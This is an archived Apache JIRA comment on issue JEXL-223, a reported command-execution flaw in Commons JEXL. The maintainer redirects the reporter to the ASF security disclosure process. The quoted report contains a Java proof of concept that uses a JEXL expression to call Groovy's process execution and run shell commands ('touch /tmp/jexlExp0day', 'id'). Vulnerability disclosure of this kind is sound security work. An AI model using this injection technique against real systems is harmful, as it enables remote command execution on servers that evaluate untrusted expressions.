[jira] [Commented] (JEXL-223) Apache Commons JEXL Expression Execute Command Vulnerabilitity

classic Classic list List threaded Threaded
1 message Options
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

[jira] [Commented] (JEXL-223) Apache Commons JEXL Expression Execute Command Vulnerabilitity

JIRA jira@apache.org

    [ https://issues.apache.org/jira/browse/JEXL-223?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15978236#comment-15978236 ]

Bruno P. Kinoshita commented on JEXL-223:
-----------------------------------------

Edited to add code format.

Also, see http://www.apache.org/security/. For Security/Vulnerabilities issues, it is better to follow the guidelines provided by the ASF Security Team when disclosing issues like this.

> Apache Commons JEXL Expression Execute Command Vulnerabilitity
> --------------------------------------------------------------
>
>                 Key: JEXL-223
>                 URL: https://issues.apache.org/jira/browse/JEXL-223
>             Project: Commons JEXL
>          Issue Type: Bug
>            Reporter: cnbird
>            Priority: Critical
>
> 0x01 Summary
> Apache Commons JEXL Expression Execute Command Vulnerabilitity throught groovy.
> 0x02 POC
> {code}
> import java.io.IOException;
> import java.util.List;
> import org.apache.commons.jexl3.JexlBuilder;
> import org.apache.commons.jexl3.JexlContext;
> import org.apache.commons.jexl3.JexlEngine;
> import org.apache.commons.jexl3.JexlExpression;
> import org.apache.commons.jexl3.MapContext;
> import org.codehaus.groovy.runtime.ProcessGroovyMethods;
> public class elExp {
> public static void main(String args[]) throws IOException {
> // Create or retrieve an engine
>    JexlEngine jexl = new JexlBuilder().create();
>    // Create an expression
>    //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
>    ProcessGroovyMethods n = new ProcessGroovyMethods();
>    System.out.println(n.execute("id").toString());
>    String jexlExp = "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch /tmp/jexlExp0day\")";
>    JexlExpression e = jexl.createExpression( jexlExp );
>    try {
>    
> Process process = new ProcessBuilder("id").start();
> } catch (IOException e1) {
> // TODO Auto-generated catch block
> e1.printStackTrace();
> }
>    // Create a context and add data
>    JexlContext jc = new MapContext();
>    jc.set("foo", jexlExp );
>    
>    // Now evaluate the expression, getting the result
>    Object o = e.evaluate(jc);
>    System.out.println(o);
>    }
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)
Loading...